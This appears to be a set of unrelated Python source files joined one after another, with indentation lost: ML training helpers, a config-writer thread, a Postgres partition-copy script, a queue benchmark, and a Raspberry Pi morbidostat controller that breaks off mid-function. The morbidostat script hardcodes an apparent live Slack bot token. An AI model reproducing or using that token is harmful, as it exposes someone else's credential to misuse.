def __init__(self, generator):
# Copy the steps per epoch and batch size if it has one
if hasattr(generator, "steps_per_epoch") and hasattr(generator, "batch_size"):
super(GeneratorEnqueuer, self).__init__(
steps_per_epoch=generator.steps_per_epoch,
batch_size=generator.batch_size,
)
else:
logging.warning(
"Input generator does not have a steps_per_epoch or batch_size "
"attribute. Continuing without them."
)
self._generator = generator
self._threads = []
self._stop_event = None
self.queue = None
self.wait_time = None
def start(self, workers=1, max_q_size=10, wait_time=0.05):
"""Kicks off threads which add data from the generator into the queue.
# Arguments
workers: number of worker threads
max_q_size: queue size (when full, threads could block on put())
wait_time: time to sleep in-between calls to put()
"""
self.wait_time = wait_time
def data_generator_task():
while not self._stop_event.is_set():
try:
if self.queue.qsize() < max_q_size:
generator_output = next(self._generator)
self.queue.put(generator_output)
else:
time.sleep(self.wait_time)
except Exception:
self._stop_event.set()
raise
try:
self.queue = queue.Queue()
self._stop_event = threading.Event()
for _ in range(workers):
self._threads.append(threading.Thread(target=data_generator_task))
self._threads[-1].start()
except:
self.stop()
raise
def is_running(self):
return self._stop_event is not None and not self._stop_event.is_set()
def stop(self, timeout=None):
"""Stop running threads and wait for them to exit, if necessary.
Should be called by the same thread which called start().
# Arguments
timeout: maximum time to wait on thread.join()
"""
if self.is_running():
self._stop_event.set()
for thread in self._threads:
if thread.is_alive():
thread.join(timeout)
self._threads = []
self._stop_event = None
self.queue = None
def __next__(self):
if not self.is_running():
raise ValueError("Generator must be running before iterating over it")
while True:
if not self.queue.empty():
return self.queue.get()
else:
# print("Waiting...")
time.sleep(self.wait_time)
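# --- illustrative usage sketch (not part of the original module; `make_batches` is an assumed generator) ---
#   enqueuer = GeneratorEnqueuer(make_batches())
#   enqueuer.start(workers=2, max_q_size=10)
#   batch = next(enqueuer)   # pulled from the internal queue
#   enqueuer.stop()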
class TrainingLogs(dict):
def __init__(self, initial_epoch=0):
"""Container for storing relevant training
information. Acts like a dictionary where
each metric name is mapped to the list
of its score for each epoch.
Keyword Arguments:
initial_epoch {int} -- The initial epoch of training (default: {0})
"""
super().__init__()
# Stores accumulated metrics over the current epoch
self.epoch_logs = {}
# Stores metrics for current batch
self.batch_logs = {}
self.epochs = initial_epoch # Completed epochs
self.steps = 0 # Overall completed training step
self.epoch_steps = 0 # Step in current epoch
def on_epoch_begin(self):
"""Resets the metric logs for the epoch"""
self.epoch_logs = {}
self.batch_logs = {}
self.epoch_steps = 0
def log_metric(self, metric, score):
self.batch_logs[metric.__name__] = score.item()
self.epoch_logs[metric.__name__] = metric.accumulate()
def log_metrics(self, metrics, scores, steps=1):
"""Log a metrics and their corresponding scores.
"""
assert len(metrics) == len(scores)
for metric, score in zip(metrics, scores):
self.log_metric(metric, score)
def step(self, steps=1):
"""Update the number of steps that have passed."""
self.steps += steps
self.epoch_steps += steps
def on_epoch_end(self):
for metric_name, score in self.epoch_logs.items():
# Create the metric score list if it's not there.
self.setdefault(metric_name, []).append(score)
self.epochs += 1
def log_validation_metric(self, metric):
self.epoch_logs["val_" + metric.__name__] = metric.accumulate()
def log_validation_metrics(self, metrics):
for metric in metrics:
self.log_validation_metric(metric)
class LossManager(object):
@utils.resettable
def __init__(self):
self.__loss_names = []
self.__loss_input_dict = {}
self.__loss_weight_dict = {}
self.__loss_dict = {}
self.__verify_loss_args = True
self.__loss_scores = {}
def __len__(self):
return len(self.__loss_names)
@property
def names(self):
return list(self.__loss_names)
def _compute_single_loss(self, model, targets, name):
# Cache the score for logging
self.__loss_scores[name] = self.__loss_weight_dict[name] * self.__loss_dict[
name
](
*[
getattr(model, loss_input)
for loss_input in self.__loss_input_dict[name]
],
targets,
)
return self.__loss_scores[name]
def verify_args(self, model):
for loss_name, loss_inputs in self.__loss_input_dict.items():
for loss_input in loss_inputs:
if not hasattr(model, loss_input):
raise AttributeError(
"Model does not have attribute {loss_input}, which"
" is an input for the loss {loss_name}".format(
loss_input=loss_input, loss_name=loss_name
)
)
def loss(self, model, targets):
# This means we need to verify that the input arguments for the loss
# exist, and notify the user if they don't
if self.__verify_loss_args:
self.verify_args(model)
self.__verify_loss_args = False
# Compute the loss
return sum(
self._compute_single_loss(model, targets, loss_name)
for loss_name in self.__loss_names
)
def get_loss_score(self, name=None):
if name is None:
assert len(self.__loss_names) == 1, (
"Need to specify a loss name if " "using multiple losses."
)
name = self.__loss_names[0]
return self.__loss_scores[name]
def add_loss(self, loss_fn, inputs, weight=1.0, name=None):
if name is None:
name = "loss_{}".format(len(self.__loss_dict))
assert name not in self.__loss_dict, f"You already added loss {name}"
self.__loss_dict[name] = loss_fn
self.__loss_input_dict[name] = inputs
self.__loss_weight_dict[name] = weight
self.__loss_names.append(name)
return name
def add_loss_with_aux(
self, stateful_loss_fn, inputs, auxilaries, weight=1.0, name=None
):
"""Loss function must store auxiliary values in stateful_loss_fn.
It then returns the combined value (however it wants to combine them)
"""
# Add the complete loss function
name = self.add_loss(stateful_loss_fn, inputs, weight=weight, name=name)
# Get the auxiliary outputs and reference their values from the stateful loss function
for aux in auxilaries:
def bind_function(aux):
def func(*args):
val = getattr(stateful_loss_fn, aux)
assert val is not None, f"Value for auxiliary loss {aux} is None"
setattr(stateful_loss_fn, aux, None)
return val
func.__name__ = aux
return func
self.add_loss(bind_function(aux), inputs, weight=weight, name=aux)
def remove_loss(self, name=None):
if name is None:
name = self.__loss_names.pop()
else:
self.__loss_names.remove(name)
loss_fn = self.__loss_dict.pop(name)
inputs = self.__loss_input_dict.pop(name)
weight = self.__loss_weight_dict.pop(name)
return {"name": name, "loss": loss_fn, "inputs": inputs, "weight": weight}
def clear_losses(self):
self.reset()
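# --- illustrative usage sketch (not part of the original module; `mse_loss` and the model
# attribute names are assumed) ---
#   losses = LossManager()
#   losses.add_loss(mse_loss, inputs=["reconstruction"], weight=1.0, name="mse")
#   total = losses.loss(model, targets)      # sum of all weighted losses
#   score = losses.get_loss_score("mse")     # cached score of a single loss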
class OptimizerManager(object):
@utils.resettable
def __init__(self):
self.__optimizer_names = []
self.__optimizer_dict = {}
def __len__(self):
return len(self.__optimizer_names)
@property
def names(self):
return list(self.__optimizer_names)
@property
def optimizers(self):
return list(self.__optimizer_dict.values())
def add_optimizer(self, optimizer, name=None):
if name is None:
name = "optimizer_{}".format(len(self))
self.__optimizer_dict[name] = optimizer
self.__optimizer_names.append(name)
def get_optimizer(self, name):
assert name in self.__optimizer_dict
return self.__optimizer_dict[name]
def remove_optimizer(self, name=None):
if name is None:
name = self.__optimizer_names.pop()
else:
self.__optimizer_names.remove(name)
optimizer = self.__optimizer_dict.pop(name)
return {"name": name, "optimizer": optimizer}
def clear_optimizers(self):
self.reset()
|
configuration.py
|
"""
This handler, when signaled, queries the DartAPI for updated configuration
information for this host. It then updates the supervisord configuration on
disk, updates the shared configurations for monitoring and scheduling, and
triggers a reread of all configurations.
"""
from . import BaseHandler
from ..configurations import ConfigurationsWriter
from dart.common.killer import GracefulEventKiller
from threading import Thread
import requests
import traceback
class ConfigurationHandler(BaseHandler):
def __init__(self, reread_trigger, rewrite_trigger, **kwargs):
super().__init__(**kwargs)
# we can set these to force a reread or a rewrite
self.reread_trigger = reread_trigger
self.rewrite_trigger = rewrite_trigger
# this is how we will trigger the thread so that it knows to exit
self.killer = GracefulEventKiller()
@property
def name(self):
return "configuration"
def can_handle(self, event_type):
# this handler wants nothing from supervisor
return False
def handle(self, event_type, event, data):
# we never get passed anything to handle since we can't handle anything
pass
def start(self):
self.thread = Thread(target=self._run)
self.thread.start()
def stop(self):
self.logger.info("{} handler received signal to stop".format(self.name))
# trigger the event using a thread safe mechanism
self.killer.kill()
# then wait for our thread to be finished
self.thread.join()
# this runs inside of a thread
def _run(self):
# if we haven't received a kill signal then wait for a trigger telling
# us to rewrite our configurations. that trigger is set every sixty
# seconds by TICK events or when we receive a message from the
# coordination handler.
while (not self.killer.killed()):
if (self.rewrite_trigger.wait(timeout=1)):
try:
ConfigurationsWriter().write()
# clear the transient error events
self.events.put({
"data": {
"component": {"name": "agent:{}".format(self.name)},
"severity": "OK",
"message": "clear",
}
})
except requests.RequestException as e:
subject = "could not talk to the DartAPI on {}: {}".format(self.fqdn, e)
message = traceback.format_exc()
self.logger.warning("{} handler {}".format(self.name, subject))
self.logger.warning(message)
# this is a system error, create an escalating incident.
# this event will automatically clear if we are able to
# successfully write our configurations.
self.events.put({
"data": {
"component": {"name": "agent:{}".format(self.name)},
"severity": 2, # high severity
"title": subject,
"message": message,
}
})
except OSError as e:
subject = "could not write configuration files on {}: {}".format(self.fqdn, e)
message = traceback.format_exc()
self.logger.warning("{} handler {}".format(self.name, subject))
self.logger.warning(message)
# this is a system error, create an escalating incident.
# this event will automatically clear if we are able to
# successfully write our configurations.
self.events.put({
"data": {
"component": {"name": "agent:{}".format(self.name)},
"severity": 2, # high severity
"title": subject,
"message": message,
}
})
except Exception as e:
subject = "unexpected error on {}: {}".format(self.fqdn, e)
message = traceback.format_exc()
self.logger.error("{} handler {}".format(self.name, subject))
self.logger.error(message)
# problems that we didn't expect should create
# non-escalating incidents. this event will not clear
# automatically.
self.events.put({
"data": {
"component": {"name": "agent:{}:error".format(self.name)},
"severity": 3, # medium severity
"title": subject,
"message": message,
}
})
finally:
# this clears the trigger so that it can be set again
self.rewrite_trigger.clear()
# now trigger a reread to pick up the configurations that
# just finished writing. if the trigger is already set then
# we will wait before trying to set it again.
self.logger.info("{} handler triggering a reread".format(self.name))
self.reread_trigger.set()
# tell everything that we're done
self.logger.info("{} handler exiting".format(self.name))
|
copy_ocp_aws_azure_data.py
|
#! /usr/bin/env python3.8
import datetime
import json
import logging
import os
import sys
from multiprocessing import Process
from multiprocessing import Queue
import psycopg2
from app_common_python import LoadedConfig
from dateutil.relativedelta import relativedelta
from psycopg2 import ProgrammingError
from psycopg2.errors import ForeignKeyViolation
from psycopg2.extras import RealDictCursor
logging.basicConfig(
format="%(processName)s (%(process)d) :: %(asctime)s: %(message)s",
datefmt="%m/%d/%Y %I:%M:%S %p",
level=getattr(logging, os.environ.get("KOKU_LOG_LEVEL", "INFO")),
)
LOG = logging.getLogger(os.path.basename(sys.argv[0] or "copy_ocp_aws_azure_data_console"))
def connect():
engine = "postgresql"
app = os.path.basename(sys.argv[0])
if bool(os.environ.get("DEVELOPMENT", False)):
user = os.environ.get("DATABASE_USER")
passwd = os.environ.get("DATABASE_PASSWORD")
host = os.environ.get("POSTGRES_SQL_SERVICE_HOST")
port = os.environ.get("POSTGRES_SQL_SERVICE_PORT")
db = os.environ.get("DATABASE_NAME")
else:
user = LoadedConfig.database.username
passwd = LoadedConfig.database.password
host = LoadedConfig.database.hostname
port = LoadedConfig.database.port
db = LoadedConfig.database.name
url = f"{engine}://{user}:{passwd}@{host}:{port}/{db}?sslmode=prefer&application_name={app}"
LOG.info(f"Connecting to {db} at {host}:{port} as {user}")
return psycopg2.connect(url, cursor_factory=RealDictCursor)
def _execute(conn, sql, params=None):
cur = conn.cursor()
LOG.debug(cur.mogrify(sql, params).decode("utf-8"))
cur.execute(sql, params)
return cur
def get_ocpawsazure_tables(conn):
sql = """
with basetable_info as (
select t.relname::text as "basetable_name",
array_agg(tc.attname::text order by tc.attnum) as "basetable_cols"
from pg_class t
join pg_namespace n
on n.oid = t.relnamespace
join pg_attribute tc
on tc.attrelid = t.oid
and tc.attnum > 0
where n.nspname = 'template0'
and t.relkind = 'r'
and t.relname ~ '^reporting_ocp(aws|azure)costlineitem.*_daily_summary$'
group
by t.relname
),
partable_info as (
select t.relname::text as "partable_name",
array_agg(tc.attname::text order by tc.attnum) as "partable_cols"
from pg_class t
join pg_namespace n
on n.oid = t.relnamespace
join pg_attribute tc
on tc.attrelid = t.oid
and tc.attnum > 0
where n.nspname = 'template0'
and t.relkind = 'p'
and t.relname ~ '^reporting_ocp(aws|azure)costlineitem.*_daily_summary_p$'
group
by t.relname
)
select bi.basetable_name,
pi.partable_name,
pi.partable_cols
from partable_info pi
join basetable_info bi
on bi.basetable_name || '_p' = pi.partable_name;
"""
LOG.info("Getting ocp on AWS/Azure base table and partition table info from template schema...")
tables = _execute(conn, sql).fetchall()
return tables
def get_customer_schemata(conn):
sql = """
select t.schema_name
from public.api_tenant t
join public.api_customer c
on c.schema_name = t.schema_name
where t.schema_name ~ '^acct'
and exists (select 1
from public.api_provider p
where p.customer_id = c.id
and (p.type ~ '^AWS' or p.type ~ '^Azure' or p.type ~ '^OCP'))
order by 1;
"""
LOG.info("Getting all customer schemata...")
return [r["schema_name"] for r in _execute(conn, sql).fetchall()]
def drop_partitions(conn, schema_name, partitioned_table):
drop_sql = f"""
delete
from {schema_name}.partitioned_tables
where schema_name = %s
and partition_of_table_name = %s
and partition_parameters->>'default' = 'false';
"""
LOG.info(f"Dropping partitions for {schema_name}.{partitioned_table}")
_execute(conn, drop_sql, (schema_name, partitioned_table))
def get_or_create_partitions(conn, schema_name, partitioned_table, start_date):
get_sql = f"""
select id
from {schema_name}.partitioned_tables
where schema_name = %s
and table_name = %s
and partition_of_table_name = %s;
"""
ins_sql = f"""
insert
into {schema_name}.partitioned_tables
(
schema_name,
table_name,
partition_of_table_name,
partition_type,
partition_col,
partition_parameters,
active
)
values (
%(schema_name)s,
%(table_name)s,
%(partition_of_table_name)s,
%(partition_type)s,
%(partition_col)s,
%(partition_parameters)s,
%(active)s
)
returning id;
"""
one_month = relativedelta(months=1)
partition_start = start_date.replace(day=1)
partition_stop = datetime.date.today().replace(day=1)
partition_parameters = {"default": False}
table_partition_rec = {
"schema_name": schema_name,
"table_name": None,
"partition_of_table_name": partitioned_table,
"partition_type": "range",
"partition_col": "usage_start",
"partition_parameters": None,
"active": True,
}
while partition_start <= partition_stop:
partition_end = partition_start + one_month
partition_name = f"{partitioned_table}_{partition_start.strftime('%Y_%m')}"
if (_execute(conn, get_sql, (schema_name, partition_name, partitioned_table)).fetchone() or {"id": None})[
"id"
]:
LOG.info(f"Found partition {partition_name}")
else:
LOG.info(f"Creating partition {partition_name}")
table_partition_rec["table_name"] = partition_name
partition_parameters["from"] = str(partition_start)
partition_parameters["to"] = str(partition_end)
table_partition_rec["partition_parameters"] = json.dumps(partition_parameters)
_execute(conn, ins_sql, table_partition_rec)
partition_start = partition_end
def get_table_min(conn, schema_name, table_name):
sql = f"""
select min(usage_start)::date as "min_start"
from {schema_name}.{table_name};
"""
LOG.info(f"Getting the minimum table start from {schema_name}.{table_name}")
min_start = _execute(conn, sql).fetchone()["min_start"] or datetime.date.today().replace(day=1)
return min_start
def get_partable_min(conn, schema_name, partable_name):
sql = f"""
select min(usage_start)::date as "min_start"
from {schema_name}.{partable_name};
"""
LOG.info(f"Getting the minimum partition start from {schema_name}.{partable_name}")
min_start = _execute(conn, sql).fetchone()["min_start"] or datetime.date.today().replace(day=1)
return min_start
def copy_data(conn, schema_name, dest_table, dest_cols, source_table):
copy_sql = """
insert
into {schema_name}.{partable_name} ({ins_cols})
select {sel_cols}
from {schema_name}.{basetable_name}
;
"""
sel_cols = ins_cols = ", ".join(dest_cols)
sql = copy_sql.format(
schema_name=schema_name,
partable_name=dest_table,
ins_cols=ins_cols,
sel_cols=sel_cols,
basetable_name=source_table,
)
LOG.info(f"Copying data from {schema_name}.{source_table} to {schema_name}.{dest_table}")
cur = _execute(conn, sql)
records_copied = cur.rowcount
LOG.info(f"Copied {records_copied} records to {schema_name}.{dest_table}")
return records_copied
def process_ocpawsazure_tables(schema_queue): # noqa
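    # Worker loop: each queue message is a JSON object shaped like
    # {"schema": ..., "table_info": {...}, "table_num": n, "table_tot": t} (built in main());
    # the literal string "DONE" marks the end of the queue.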
with connect() as conn:
while True:
msg = schema_queue.get()
if msg == "DONE":
LOG.info("End of queue found!")
break
work_data = json.loads(msg)
schema = work_data["schema"]
table_info = work_data["table_info"]
tnum = work_data["table_num"]
ttot = work_data["table_tot"]
LOG.info(
f"***** Running copy against schema {schema}.{table_info['basetable_name']} ({tnum}/{ttot}) *****"
)
LOG.info(f"Processing {schema}.{table_info['basetable_name']}")
_execute(conn, f"set search_path = {schema}, public;")
try:
partable_min_date = get_table_min(conn, schema, table_info["basetable_name"])
drop_partitions(conn, schema, table_info["partable_name"])
get_or_create_partitions(conn, schema, table_info["partable_name"], partable_min_date)
except ProgrammingError as p:
LOG.warning(
f"{p.__class__.__name__} :: {p}{os.linesep}Skip processing "
+ f"for {schema}.{table_info['basetable_name']}."
)
conn.rollback()
continue
except Exception as e:
conn.rollback()
LOG.warning(f"VERY WARNING :: {e.__class__.__name__} :: {e}")
continue
else:
try:
conn.commit()
except Exception as x1:
LOG.warning(
f"{x1.__class__.__name__} :: {x1}{os.linesep}Skip processing "
+ f"for {schema}.{table_info['basetable_name']}."
)
conn.rollback()
continue
try:
                # copy all rows from the base summary table into the partitioned table
copy_data(
conn,
schema,
table_info["partable_name"],
table_info["partable_cols"],
table_info["basetable_name"],
)
except (ProgrammingError, ForeignKeyViolation) as p:
LOG.warning(
f"{p.__class__.__name__} :: {p}{os.linesep}Rolling back copy transaction "
+ f"for {schema}.{table_info['basetable_name']}."
)
conn.rollback()
except Exception as e:
conn.rollback()
LOG.warning(f"VERY WARNING :: {e.__class__.__name__} :: {e}")
else:
try:
conn.commit()
except Exception as x1:
LOG.warning(
f"{x1.__class__.__name__} :: {x1}{os.linesep}Rollback copy transaction on COMMIT exception "
+ f"for {schema}.{table_info['basetable_name']}."
)
conn.rollback()
def main():
# get customer schemata
schemata = tables = None
with connect() as conn:
schemata = get_customer_schemata(conn)
tables = get_ocpawsazure_tables(conn)
if schemata and tables:
# Combine for the individual job work
target_tables = [{"schema": schema, "table_info": table_info} for schema in schemata for table_info in tables]
t_tot = len(target_tables)
del schemata
del tables
# start worker processes
max_workers = int(sys.argv[1]) if len(sys.argv) > 1 else int(os.environ.get("NUM_JOB_WORKERS", 1))
if max_workers > t_tot:
max_workers = t_tot
schema_queues = []
workers = []
for wnum in range(max_workers):
LOG.info(f"Creating worker {len(workers)}")
schema_queues.append(Queue())
workers.append(
Process(target=process_ocpawsazure_tables, name=f"copy_worker_{wnum}", args=((schema_queues[-1]),))
)
workers[-1].daemon = True
workers[-1].start()
# load worker queues
LOG.info("Filling worker queues")
for t_num, data in enumerate(target_tables):
q_num = t_num % max_workers
data["table_num"] = t_num + 1
data["table_tot"] = t_tot
schema_queues[q_num].put(json.dumps(data))
# mark worker queue end
for q in schema_queues:
q.put("DONE")
# wait on all workers
LOG.info("Waiting on workers...")
for wrkr in workers:
wrkr.join()
else:
LOG.info("No schemata or tables found matching the criteria.")
if __name__ == "__main__":
main()
|
observer.py
|
# Copyright (c) 2014 Rackspace, Inc.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import division
from __future__ import print_function
import multiprocessing as mp
import random
import sys
import time
from gevent import monkey as curious_george
curious_george.patch_all(thread=False, select=False)
import gevent
import marktime
from six.moves import urllib
from zaqarclient.queues import client
from zaqarclient.transport import errors
from zaqar.bench import config
CONF = config.conf
#
# TODO(kgriffs): Factor out the common code from producer, consumer
# and worker (DRY all the things!)
#
def _extract_marker(links):
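    """Return the 'marker' query parameter from the rel='next' link.

    Illustrative link shape: {'rel': 'next', 'href': '/v2/queues/q1/messages?marker=abc'} -> 'abc'
    """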
for link in links:
if link['rel'] == 'next':
href = link['href']
break
query = urllib.parse.urlparse(href).query
params = urllib.parse.parse_qs(query)
return params['marker'][0]
def observer(queues, stats, test_duration, limit):
"""Observer Worker
The observer lists messages without claiming them.
"""
end = time.time() + test_duration
total_elapsed = 0
total_succeeded = 0
total_failed = 0
queues = [{'q': q, 'm': None} for q in queues]
while time.time() < end:
# NOTE(kgriffs): Distribute requests across all queues evenly.
queue = random.choice(queues)
try:
marktime.start('list_messages')
cursor = queue['q'].messages(limit=limit, marker=queue['m'],
include_claimed=True)
total_elapsed += marktime.stop('list_messages').seconds
total_succeeded += 1
messages = list(cursor)
if messages:
# TODO(kgriffs): Figure out a less hacky way to do this
# while preserving the ability to measure elapsed time
# per request.
queue['m'] = _extract_marker(cursor._links)
except errors.TransportError as ex:
sys.stderr.write("Could not list messages : {0}\n".format(ex))
total_failed += 1
total_requests = total_succeeded + total_failed
stats.put({
'total_requests': total_requests,
'total_succeeded': total_succeeded,
'total_elapsed': total_elapsed,
})
def load_generator(stats, num_workers, num_queues,
test_duration, limit):
cli = client.Client(CONF.server_url)
queues = [cli.queue(CONF.queue_prefix + '-' + str(i))
for i in range(num_queues)]
gevent.joinall([
gevent.spawn(observer,
queues, stats, test_duration, limit)
for _ in range(num_workers)
])
def crunch(stats):
total_requests = 0
total_succeeded = 0
total_elapsed = 0.0
while not stats.empty():
entry = stats.get_nowait()
total_requests += entry['total_requests']
total_succeeded += entry['total_succeeded']
total_elapsed += entry['total_elapsed']
return total_requests, total_succeeded, total_elapsed
def run(upstream_queue):
num_procs = CONF.observer_processes
num_workers = CONF.observer_workers
num_queues = CONF.num_queues
# Stats that will be reported
duration = 0
total_requests = 0
total_succeeded = 0
throughput = 0
latency = 0
# Performance test
if num_procs and num_workers:
test_duration = CONF.time
stats = mp.Queue()
args = (stats, num_workers, num_queues, test_duration,
CONF.messages_per_list)
procs = [mp.Process(target=load_generator, args=args)
for _ in range(num_procs)]
if CONF.verbose:
print('\nStarting observer (op={0}, ow={1})...'.format(
num_procs, num_workers))
start = time.time()
for each_proc in procs:
each_proc.start()
for each_proc in procs:
each_proc.join()
(total_requests, total_succeeded, total_elapsed) = crunch(stats)
duration = time.time() - start
throughput = total_succeeded / duration
if total_succeeded:
latency = (1000 * total_elapsed / total_succeeded)
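        # throughput: successful list requests per second; latency: mean milliseconds per successful request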
upstream_queue.put({
'observer': {
'duration_sec': duration,
'total_reqs': total_requests,
'successful_reqs': total_succeeded,
'reqs_per_sec': throughput,
'ms_per_req': latency,
}
})
|
vish_control_drugs.py
|
#!/usr/bin/python3
"""The basic idea is this: the bugs grow for a certain period of time, dt. After this time, if their optical density,
OD, (as read by a photodetector) is above a threshold, OD_thr, and they have grown since the last time point, drug is
administered through a pump, P_drug. If OD is less than OD_thr, then nutrient solution is added through another pump,
P_nut.
This system will be controlled by a Raspberry Pi, using the SPI and GPIO ports. To activate the pumps, GPIO ports are
set to 1/GPIO.HIGH/True for a certain period of time, t_pump. Optical density data is read via an analogue to digital
converter attached to one of the SPI ports on the RPi.
Data will be saved on the RPi and stored in the cloud. Using the Slack API, we will be able to query the RPi to find
out how the experiment is progressing."""
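# A minimal sketch of the control rule described above. It is illustrative only and is not
# called anywhere; the real loop below works on averaged OD readings and drives GPIO pumps.
def _control_decision(od, last_dilution_od, od_thr, od_min):
    """Return which pump to run for one control step: 'drug', 'nutrient' or None."""
    if od <= od_min:
        return None  # culture too dilute to act on yet
    if od > od_thr and od > last_dilution_od:
        return "drug"  # grew past the threshold since the last dilution -> administer drug (P_drug)
    return "nutrient"  # otherwise top up with nutrient solution (P_nut)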
# Needed for Running the Pumps
import time
from datetime import datetime
import csv
import threading
import os
from subprocess import call
from subprocess import Popen, PIPE
import RPi.GPIO as GPIO
import numpy as np
import board
import busio
import adafruit_ads1x15.ads1015 as ADS
from adafruit_ads1x15.analog_in import AnalogIn
# Needed for Slack Integration
import re
import json
# import psutil
from slackclient import SlackClient
# Needed for Screenshots
#import gtk.gdk
from subprocess import call
#Graphs
import pandas as pd
import matplotlib.pyplot as plt
# Define Experimental Variables
time_between_pumps = 12 # how often to activate pumps, in minutes
OD_thr = 1.5 # threshold above which to activate drug pump [vish bench tests: empty: 3.5V, Clear Vial: 0.265V, Very Cloudy Vial: 2.15V]
OD_min = .7 # minimum OD needed to run the loop that activates pumps; 55
time_between_ODs = 2 # how often to gather OD data, in seconds
time_between_graphs = 30 # how often to graph, in minutes
#time_between_writes = 1 # how often to write out OD data, in minutes
total_time = 48*60*60 #in seconds, default is 2 days
loops_between_ODs = 1
loops_between_pumps = (time_between_pumps*60)/time_between_ODs # time between pumps in loops
#loops_between_writes = (time_between_writes*60)/time_between_ODs # time bewteen writes in loops
num_cham = 1 # number of morbidostat vials being used
OD_av_length = 30 #number of OD measurements to be averaged
# Setup the GPIO Pins to Control the Pumps
P_drug_pins = [20]
P_nut_pins = [24]
P_waste_pins = [25]
P_LED_pins = [21]
P_fan_pins = [26]
pin_list = [P_drug_pins + P_nut_pins + P_waste_pins + P_LED_pins + P_fan_pins]
GPIO.setmode(GPIO.BCM)
for pin in pin_list:
GPIO.setup(pin, GPIO.OUT)
# GPIO.output(pin,0)
# GPIO.output(P_fan_pins,1)
# Set Up I2C to Read OD Data
# Create the I2C bus
i2c = busio.I2C(board.SCL, board.SDA)
# Create the ADC object using the I2C bus
ads = ADS.ADS1015(i2c)
# Create single-ended input on channel 0
# photoreceptor_channel = 0
photod = AnalogIn(ads, ADS.P0)
# P_drug_times = [2/1.4]
# P_nut_times = [2/1.6]
# P_waste_times = [2/1.6]
P_drug_times = .75
P_nut_times = .75
P_waste_times = .75
# Set Up Reporting for Slack
slack_client = SlackClient("xoxb-15598920096-507190138311-pIsmBndOCk1YsVbflP5qXnnT")
user_list = slack_client.api_call("users.list")
for user in user_list.get('members'):
if user.get('name')== "blob":
slack_user_id = user.get('id')
break
if slack_client.rtm_connect():
print ("Connected!")
#Report on RAM usage every half hour
class Morbidostat():
# Read data from the ADC
def __init__(self):
self.running_data = [] # the list which will hold our 2-tuples of time and OD
self.pump_data = []
# self.currOD = np.zeros(num_cham)
self.currOD = 0
# averaged OD value
# self.avOD = np.zeros(num_cham)
self.avOD = 0
# OD averaging buffer
self.avOD_buffer = np.zeros(OD_av_length)#need to change for multiplexing
self.start_time = datetime.now()
os.makedirs("/mnt/morbidodata/"+str(self.start_time))
self.elapsed_loop_time = 0
self.loops = 0
self.last_dilutionOD = 0
self.nut = 0
self.drug = 1
self.waste = 2
self.drug_mass = 0
self.outfile_OD = "/mnt/morbidodata/%s/ODdata_%s.csv" % (self.start_time, self.start_time)
file = open(self.outfile_OD, 'a')
wr = csv.writer(file)
# wr.writerow(['Current OD', 'Average OD','OD Timing'])
wr.writerow(['current', 'average','time','hour'])
file.close()
self.outfile_pump = "/mnt/morbidodata/%s/pump_%s.csv" % (self.start_time, self.start_time)
file = open(self.outfile_pump, 'a')
wr = csv.writer(file)
# wr.writerow(['Nutrient Pump', 'Drug Pump','Waste Pump','Pump Timing', 'Drug Mass'])
wr.writerow(['media', 'drug','waste','pump_time','hour','drug_mass'])
file.close()
# print('Experiment begun at %02s:%02s:%02s' % (self.start_time.hour, self.start_time.minute, self.start_time.second))
print(self.start_time.strftime('Experiment begun at %H:%M:%S on %a - %b %d, %Y'))
self.on_timer()
slack_client.api_call(
"chat.postMessage",
channel='#morbidotest',
text = self.start_time.strftime('Experiment begun at %H:%M:%S on %a - %b %d, %Y'),
as_user=True)
def get_OD(self):
GPIO.output(P_LED_pins,1)
# self.value = []
#self.cpu_pct = psutil.cpu_percent(interval=1, percpu=True)
time.sleep(0.1)
# for i in photoreceptor_channel_pins:
# self.value.append( adc.read_adc(i))
# self.value.append(photod.voltage)
self.currOD = photod.voltage #np.asarray(self.value)#[0]
time.sleep(0.1)
GPIO.output(P_LED_pins,0)
#print("OD: current voltage (raw) = ", self.currOD[0:num_cham])
#print('Elapsed Time: %02s:%02s:%02s; OD = ' % (self.now.hour, self.now.minute, self.now.second), self.currOD[0:num_cham])
#process the data
#self.avOD_buffer = np.append(self.avOD_buffer, self.currOD.reshape(1,num_cham), axis=0) #might need to transpose if more than one pd (for multiplexing)
self.avOD_buffer = np.append(self.avOD_buffer, self.currOD) #might need to transpose if more than one pd (for multiplexing)
# then remove the first item in the array, i.e. the oldest
self.avOD_buffer = np.delete(self.avOD_buffer, 0)
# calculate average for each flask
self.avOD = np.mean(self.avOD_buffer)
def pump_on(self,pump):
GPIO.output(pump, 1)
print('Turning on pump',pump)
def pump_off(self,pump):
GPIO.output(pump, 0)
print('Turning off pump',pump)
def all_pump_off(self):
for i in pin_list:
GPIO.output(i, 0)
print('Turning off all pumps')
def savefunc(self):
print('saving to disk')
OD_tmplist = []
pump_tmplist = []
# for i in range(num_cham):
# OD_tmplist.append(self.currOD[i])
# OD_tmplist.append(self.avOD[i])
OD_tmplist.append(self.currOD)
OD_tmplist.append(self.avOD)
# file = open(self.outfile_OD, 'ab')
with open(self.outfile_OD, 'a') as file:
# OD_tmplist.append(self.now)
OD_tmplist.append(self.nows)
OD_tmplist.append((86400 - self.elapsed_time.seconds)/3600)
wr = csv.writer(file)
wr.writerow(OD_tmplist)
file.close()
# file = open(self.outfile_pump, 'ab')
# pump_tmplist =[self.nut,self.drug,self.waste,self.now,self.drug_mass]
pump_tmplist =[self.nut,self.drug,self.waste,self.nows,(86400 - self.elapsed_time.seconds)/3600,self.drug_mass]
with open(self.outfile_pump, 'a') as file:
wr = csv.writer(file)
wr.writerow(pump_tmplist)
file.close()
self.nut = 0
self.drug = 1
self.waste = 2
def graphOD(self):
print('generating graph')
# slack_client.api_call(
# "chat.postmessage",
# channel='#morbidotest',
# text = "the graph goes here!",
# as_user=true)
slack_client.api_call(
"chat.postMessage",
channel='#morbidotest',
text = ('Elapsed Time: %s ; OD = %.3f' % (self.secondsToText(86400 - self.elapsed_time.seconds),self.currOD)),
as_user=True)
#print ('Elapsed Time: %s; OD = %.3f' % (self.secondsToText(86400 - self.elapsed_time.seconds),self.currOD))
allODs = pd.read_csv(self.outfile_OD, index_col='hour')
# allODs['hour'] = allODs['time'] - allODs['time'].iloc[0]
